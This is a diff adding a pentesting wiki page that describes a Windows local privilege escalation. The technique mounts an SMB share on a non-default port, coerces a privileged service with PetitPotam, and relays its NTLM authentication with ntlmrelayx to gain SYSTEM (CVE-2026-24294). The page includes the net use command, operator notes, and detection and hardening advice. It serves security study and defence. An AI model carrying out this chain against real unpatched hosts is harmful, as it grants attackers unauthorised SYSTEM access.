|
| 1 | +# Local NTLM Reflection via SMB Arbitrary Port |
| 2 | + |
| 3 | +{{#include ../../banners/hacktricks-training.md}} |
| 4 | + |
| 5 | +Recent Windows builds introduced **SMB client support for alternative TCP ports**. That feature can be abused to turn **local NTLM authentication** into a **SYSTEM local privilege escalation** when the attacker can: |
| 6 | + |
| 7 | +1. Open an SMB connection to an attacker-controlled listener on a **non-445 port** |
| 8 | +2. Keep that TCP connection alive |
| 9 | +3. Coerce a **privileged local client** to access the **same SMB share path** |
| 10 | +4. Relay the resulting **local NTLM authentication** back to the machine's real SMB service |
| 11 | + |
| 12 | +This is the primitive behind **CVE-2026-24294**, patched in **March 2026**. |
| 13 | + |
| 14 | +## Why it works |
| 15 | + |
| 16 | +The older CMTI / serialized-SPN reflection trick is covered here: |
| 17 | + |
| 18 | +{{#ref}} |
| 19 | +../ntlm/README.md |
| 20 | +{{#endref}} |
| 21 | + |
| 22 | +This newer variant does **not** need a marshalled hostname. Instead it abuses two SMB client behaviours: |
| 23 | + |
| 24 | +- **Alternative port support** on **Windows 11 24H2** and **Windows Server 2025**, exposed to users with `net use \\host\share /tcpport:<port>` |
| 25 | +- **SMB connection reuse / multiplexing**, where multiple authenticated sessions can ride the same TCP connection |
| 26 | + |
| 27 | +That means a low-privileged user can first create a TCP connection from the SMB client to an attacker SMB server on a high port, then coerce a privileged service to access the **exact same UNC path**. If Windows decides to reuse the existing TCP connection, the privileged NTLM exchange is sent over the attacker-controlled transport and can be relayed to the local SMB server. |
| 28 | + |
| 29 | +## Preconditions |
| 30 | + |
| 31 | +- Target supports SMB alternative ports: |
| 32 | + - **Windows 11 24H2** or later |
| 33 | + - **Windows Server 2025** or later |
| 34 | +- The attacker can run a local or remote SMB server on a chosen high port |
| 35 | +- The attacker can coerce a privileged service to access a UNC path |
| 36 | +- The privileged authentication must be **NTLM local authentication** |
| 37 | +- The target must be relayable: |
| 38 | + - Synacktiv reported it worked by default on **Windows Server 2025** |
| 39 | + - Their chain did **not** work on **Windows 11 24H2** because outbound SMB signing is enforced there by default |
| 40 | + |
| 41 | +## Userland and internals |
| 42 | + |
| 43 | +From the command line the feature looks simple: |
| 44 | + |
| 45 | +```cmd |
| 46 | +net use \\192.168.56.3\share /tcpport:12345 |
| 47 | +``` |
| 48 | + |
| 49 | +Programmatically, the client uses `WNetAddConnection4W` with undocumented `lpUseOptions` data. The relevant option is `TraP` (transport parameters), which eventually reaches the kernel SMB client through an FSCTL and is parsed by `mrxsmb`. |
| 50 | + |
| 51 | +Important practical notes: |
| 52 | + |
| 53 | +- **UNC syntax still has no port field** |
| 54 | +- **`net use` is per-logon-session** |
| 55 | +- The bypass still works because **the TCP connection and the SMB session are separate objects** |
| 56 | +- Reusing the **same share path** is mandatory if the exploit depends on the SMB client reusing the previously created TCP connection |
| 57 | + |
| 58 | +## Exploitation flow |
| 59 | + |
| 60 | +### 1. Create the attacker-controlled SMB transport |
| 61 | + |
| 62 | +Run an SMB server on a high port and make Windows connect to it: |
| 63 | + |
| 64 | +```cmd |
| 65 | +net use \\192.168.56.3\share /tcpport:12345 |
| 66 | +``` |
| 67 | + |
| 68 | +The server can accept any credential pair you control, for example `user:user`. The goal of this step is not privilege escalation yet, only to make the Windows SMB client open and keep a reusable TCP connection to your listener. |
| 69 | + |
| 70 | +### 2. Coerce a privileged service to the same UNC path |
| 71 | + |
| 72 | +Use a coercion primitive such as **PetitPotam** against the **same** `\\192.168.56.3\share` path. If the coerced client is privileged and the target name is local (`localhost` or a local IP/host), Windows performs **NTLM local authentication**. |
| 73 | + |
| 74 | +Because the TCP connection is reused, that privileged NTLM exchange travels to the attacker SMB service instead of directly to the real local SMB server. |
| 75 | + |
| 76 | +### 3. Relay the privileged authentication back to local SMB |
| 77 | + |
| 78 | +The attacker-controlled SMB service forwards the privileged NTLM exchange to `ntlmrelayx.py`, which relays it to the machine's real SMB listener and obtains a session as `NT AUTHORITY\SYSTEM`. |
| 79 | + |
| 80 | +Typical tooling from the public writeup: |
| 81 | + |
| 82 | +- `smbserver.py` on a custom port to receive the privileged auth over the reused TCP connection |
| 83 | +- `ntlmrelayx.py` to relay the captured NTLM to local SMB |
| 84 | +- `PetitPotam.exe` or another coercion primitive to force the privileged authentication |
| 85 | + |
| 86 | +## Operator notes |
| 87 | + |
| 88 | +- This is a **local privilege escalation** technique, not a generic remote relay trick |
| 89 | +- The attacker-controlled SMB service must handle the privileged authentication on the **same TCP connection** originally used for the share mount |
| 90 | +- If the coerced access hits a **different share path**, Windows may establish a different connection and the chain breaks |
| 91 | +- SMB signing requirements can kill the relay even when the arbitrary-port step works |
| 92 | +- If you only have Kerberos material or cannot force local NTLM, this exact variant is not enough |
| 93 | + |
| 94 | +## Detection and hardening |
| 95 | + |
| 96 | +- Patch **CVE-2026-24294** from **March 2026 Patch Tuesday** |
| 97 | +- Watch for `net use` or `New-SmbMapping` using **non-default SMB ports** |
| 98 | +- Alert on unusual outbound SMB from workstations or servers to **high TCP ports** |
| 99 | +- Review coercion opportunities such as **EFSRPC / PetitPotam-style** triggers |
| 100 | +- Enforce SMB signing where possible; Synacktiv specifically notes this blocked their relay on Windows 11 24H2 |
| 101 | + |
| 102 | +## References |
| 103 | + |
| 104 | +- [Synacktiv - Bypassing Windows authentication reflection mitigations for SYSTEM shells - Part 1](https://www.synacktiv.com/en/publications/bypassing-windows-authentication-reflection-mitigations-for-system-shells-part-1.html) |
| 105 | +- [Microsoft Learn - Configure alternative SMB ports for Windows Server 2025](https://learn.microsoft.com/en-us/windows-server/storage/file-server/smb-ports) |
| 106 | +- [Microsoft Learn - WNetAddConnection4W](https://learn.microsoft.com/en-us/windows/win32/api/winnetwk/nf-winnetwk-wnetaddconnection4w) |
| 107 | +- [Project Zero - Windows Exploitation Tricks: Trapping Virtual Memory Access (2025 Update)](https://projectzero.google/2025/01/windows-exploitation-tricks-trapping.html) |
| 108 | +- [MSRC - CVE-2026-24294](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24294) |
| 109 | + |
| 110 | +{{#include ../../banners/hacktricks-training.md}} |
0 commit comments